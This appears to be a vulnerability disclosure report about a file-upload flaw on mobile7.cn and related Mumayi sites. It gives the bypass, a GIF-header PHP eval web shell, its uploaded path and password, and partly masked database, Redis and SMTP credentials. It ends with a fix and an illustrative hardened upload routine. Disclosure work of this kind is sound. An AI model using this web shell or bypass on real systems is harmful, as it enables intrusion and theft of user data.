Getshell on one website affects multiple business sites.
#1 Registered a developer account on Wood Ant's Seventh Media site, http://mobile7.cn. Under Developer information > Financial information there is a certificate upload.
Capture the upload request and change the file suffix to php.
However, the server checks the file header.
The PHP file code is as follows:
GIF89a<?php @eval($_POST['pass']);?>
The file passes the server's check.
The front end returns the stored path directly.
Kitchen Knife connection http://mobile7.cn/Public/upload/cache/3eab38bede51f782b04b7e31aa687bfc.php
Password: pass
Affected sites:
Wood ant wordpress
passport.mumayi.com
wan.mumayi.com
open.mumayi.com
android77.com
mobile7.cn
119.cc
Photos of developer ID cards and business licenses are exposed. Data volume not estimated.
Database connection information exposed
/var/html/corp_open/www.mobile7.cn/Conf/config.php
<?php
// configure
return array(
    'URL_MODEL' => 3, // if your environment does not support PATHINFO, set it to 3
    'DB_TYPE' => 'mysql',
    'DB_HOST' => '17*******09',
    'DB_NAME' => 'm********ayi',
    'DB_USER' => 'm*******yi',
    'DB_PWD' => ',A********Z',
    'DB_PORT' => '123',
    'DB_PREFIX' => '*******_',
    'SESSION_PREFIX' => 'think',
    'SESSION_EXPIRE' => 3600*7, // default SESSION validity period
    'URL_CASE_INSENSITIVE' => true,
    'ACTIVITY_REGIST' => FALSE, // activity status
    'TMP_AUTH_UPLOAD_DIR' => dirname(__FILE__)));
/var/html/corp_open/open_mumayi/market/redis.class.php
<?php
$RedisConfig = @require_once("/mnt/html/redis_config/config.php");
class EggRedis {
    public $host = '1*******4';
    public $port = 6***9;
    public $password = "m*********Ta";
/var/html/corp_open/wan_mumayi/include/Email.php
////////////////////////////////////////
function __construct() {
    $this->CharSet = 'utf-8';
    $this->IsSMTP();
    $this->SMTPAuth = true; // enable SMTP authentication
    // $this->SMTPSecure = "ssl"; // gmail sets the prefix to the server
    $this->Host = "smtp.163.com"; // sets GMAIL as the SMTP server
    $this->Port = 25; // gmail set the SMTP port for the GMAIL server
    $this->Username = "c*******el@163.com"; // smtp User
    $this->Password = 'W********4'; // smtp password
    $this->AddReplyTo("c*******l@163.com", "wood ant network"); // email to whom
    $this->From = "cui*******el@163.com"; // sender's email
    $this->FromName = "wood ant network"; // sender's name
define('DBHOST', '1*******2');
define('DBUSER', 'w*******yi');
define('DBPASSWD', 'H*******f');
define('DBNAME', 'w*******yi');
define('DBPREFIX', 'w*******_');
Solution:
Configure the upload directory so that PHP files in it are not parsed.
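The upload check from #1 (file header verified, suffix taken from the request) next to a naming routine that ignores the client's suffix, as an added example that is not the site's code. The function names, the allowlist and the sample bytes are constructed for illustration; it complements the directory setting above rather than replacing it.

```php
<?php
// Added example, not the site's code. All names and the sample are constructed.

// Accepted file headers, mapped to the only suffixes ever written to disk.
const ALLOWED = [
    "GIF87a"            => 'gif',
    "GIF89a"            => 'gif',
    "\xFF\xD8\xFF"      => 'jpg',
    "\x89PNG\r\n\x1a\n" => 'png',
];

// Returns the suffix implied by the file header, or null if the header is not allowed.
function sniff_extension(string $bytes): ?string {
    foreach (ALLOWED as $magic => $ext) {
        if (strncmp($bytes, $magic, strlen($magic)) === 0) {
            return $ext;
        }
    }
    return null;
}

// Behaviour described in the report: the header is checked,
// but the stored suffix still comes from the client-supplied file name.
function weak_store_name(string $bytes, string $clientName): ?string {
    if (sniff_extension($bytes) === null) {
        return null;
    }
    return md5($bytes) . '.' . pathinfo($clientName, PATHINFO_EXTENSION);
}

// Hardened: the client file name is ignored entirely.
// Both the random name and the suffix are chosen by the server.
function safe_store_name(string $bytes): ?string {
    $ext = sniff_extension($bytes);
    return $ext === null ? null : bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample: a GIF header followed by a harmless PHP statement.
$sample = "GIF89a<?php echo 'executed'; ?>";

echo "weak: ", weak_store_name($sample, 'license.php'), "\n";
echo "safe: ", safe_store_name($sample), "\n";
```

With the weak routine the stored name keeps the suffix sent in the request; with the hardened one the same bytes can only be stored under an allowlisted image suffix, so the web server has no reason to hand the file to the PHP interpreter.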